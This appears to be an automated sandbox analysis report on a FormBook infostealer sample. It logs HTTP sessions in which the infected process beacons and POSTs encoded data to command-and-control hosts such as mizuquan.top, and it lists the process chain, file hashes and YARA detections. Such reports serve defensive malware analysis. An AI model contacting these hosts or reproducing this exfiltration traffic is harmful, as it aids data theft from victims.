                                              28192.168.2.75213113.248.169.48804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:45.607721090 CEST567OUTGET /h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:46.060394049 CEST419INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 09:38:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 279
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 6c 70 50 47 78 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 42 49 65 6c 4a 35 47 4f 35 31 47 47 4d 58 56 69 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 55 2b 6b 55 75 59 72 7a 69 62 77 6b 2f 7a 63 69 72 61 4f 76 30 66 73 49 61 59 56 45 31 46 4c 5a 71 37 6d 4b 4a 56 6b 5a 49 31 50 50 35 70 56 75 78 37 5a 6b 4d 30 6b 50 26 51 46 34 74 4c 3d 6c 42 50 38 41 5a 72 70 6e 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.75213643.242.202.169804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:39:05.249061108 CEST826OUTPOST /e0nr/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Origin: http://www.mizuquan.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.mizuquan.top/e0nr/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 64 45 2f 4f 34 48 33 46 33 78 47 67 4d 65 71 72 44 35 4b 55 4a 6f 4e 64 31 51 48 71 75 49 4b 46 4e 31 6a 2f 4c 70 71 56 7a 4f 68 32 39 48 56 33 41 3d 3d
                                              Data Ascii: 7lpPGx=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPdE/O4H3F3xGgMeqrD5KUJoNd1QHquIKFN1j/LpqVzOh29HV3A==
                                              Sep 25, 2024 11:39:06.101471901 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.75213743.242.202.169804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:39:07.796490908 CEST846OUTPOST /e0nr/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Origin: http://www.mizuquan.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.mizuquan.top/e0nr/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 51 32 5a 33 30 78 39 49 56 2f 48 4d 78 37 79 70 64 4c 4b 45 72 4c 37 76 6d 52 68 2b 65 37 45 79 76 75 78 2b 46 57 45 30 46 64 4d 37 44 64 36 64 51 3d
                                              Data Ascii: 7lpPGx=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYQ2Z30x9IV/HMx7ypdLKErL7vmRh+e7Eyvux+FWE0FdM7Dd6dQ=
                                              Sep 25, 2024 11:39:08.656403065 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.75213843.242.202.169804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:39:10.350511074 CEST1859OUTPOST /e0nr/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Origin: http://www.mizuquan.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.mizuquan.top/e0nr/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 52 51 73 76 71 74 69 77 70 61 51 6f 51 6a 58 48 55 30 2b 61 6c 72 4e 2f 4e 55 7a 62 4e 71 41 31 33 57 30 4e 6e 46 73 62 66 4d 52 67 65 51 33 4d 31 74 46 6b 30 6c 64 4f 62 34 74 71 70 6e 65 65 74 57 30 51 64 67 52 75 39 6b 49 51 62 38 61 55 56 58 2b 69 41 74 50 45 43 32 65 58 48 73 54 49 2b 44 6d 4e 6c 35 2f 6b 54 35 4b 38 52 54 37 41 62 4c 4a 50 33 5a 46 69 38 33 35 46 6e 4d 45 68 72 50 65 76 47 62 69 64 75 41 61 66 6a 74 4c 5a 2b 35 4b 7a 47 34 6b 79 34 71 6c 52 45 30 65 6e 58 [TRUNCATED]
                                              Data Ascii: 7lpPGx=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdVRQsvqtiwpaQoQjXHU0+alrN/NUzbNqA13W0NnFsbfMRgeQ3M1tFk0ldOb4tqpneetW0QdgRu9kIQb8aUVX+iAtPEC2eXHsTI+DmNl5/kT5K8RT7AbLJP3ZFi835FnMEhrPevGbiduAafjtLZ+5KzG4ky4qlRE0enX+0sx2ClC8crqKO8X5RRcsKD0GBAto/oU7FnzLFyAPMzEy6czaVu5jSH6Pl8L64RsUbPM7XvpTnv9FiBbDrc0HFtf8UX3bt2c9ZUJHo6dgHnMyiSEZxQDX3l11hkJyQb3o6cLaWwgCSAy1zn36r7oHOWFKLerwlp0rwB8wV+F2KuhZuLtD4AfwbegpJ5DKElNmIMU86PjC/NY0jJtcbrBLDADd0NZhYnNNXwa+jB5WeEFiSpGq7WSFUftzdswxkk7jAw1g9cd5168YtqLi1CXC8lMJdu1dWJxzRCIUv9PKLd15w86weyBmtrwUFOFT3pb45bNWgg7+D9j2FFHBrSzipyzDSP0Shp/Um1n5ZmLCZBBZG+wXiv7A2Ks+KhGsrZO5pwbbb6yxpUHA0ed9lbUqn1jysozu67CEh8QwtotuCGzx1BqhmLrEB4fU0U6oTDOP1duiiKJYjvWrOC6PHuS2NeaIAK5akW/4dk43i1e2mgFKds7F2lMkwPAsBQd+dfnCXiAWJCWLm1eC3qxjMzeGW0uG0fYnnut02ruQZ5oKYfZCI7T3stRV4aU4G5RoznKaK3jXnu38d8wuoL177izn4bVXiTOURd7AOsrjocOhcnKOSCnIAb/iJurFIRe0Zt7EF8G70Vn+RlwZHcPG1kr8sdgr+exaKdJ8M [TRUNCATED]
                                              Sep 25, 2024 11:39:11.201750040 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.75213943.242.202.169804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:39:12.892497063 CEST570OUTGET /e0nr/?7lpPGx=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL3dlYbix0Oof31N0WjWMIZqIkiGsjqX+LyUecOwrV8dky8MLclvmAsWX&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:39:13.754086971 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:13 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:05:36:06
                                              Start date:25/09/2024
                                              Path:C:\Users\user\Desktop\CYTAT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CYTAT.exe"
                                              Imagebase:0x400000
                                              File size:1'357'205 bytes
                                              MD5 hash:A1EECC39C791B5A57C0E914B116A1672
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:05:36:09
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CYTAT.exe"
                                              Imagebase:0x1b0000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:05:36:22
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe"
                                              Imagebase:0x9f0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:12
                                              Start time:05:36:24
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\netbtugc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                              Imagebase:0xe10000
                                              File size:22'016 bytes
                                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:13
                                              Start time:06:56:00
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe"
                                              Imagebase:0x9f0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:16
                                              Start time:06:56:27
                                              Start date:25/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff722870000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:3.4%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:8.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:35
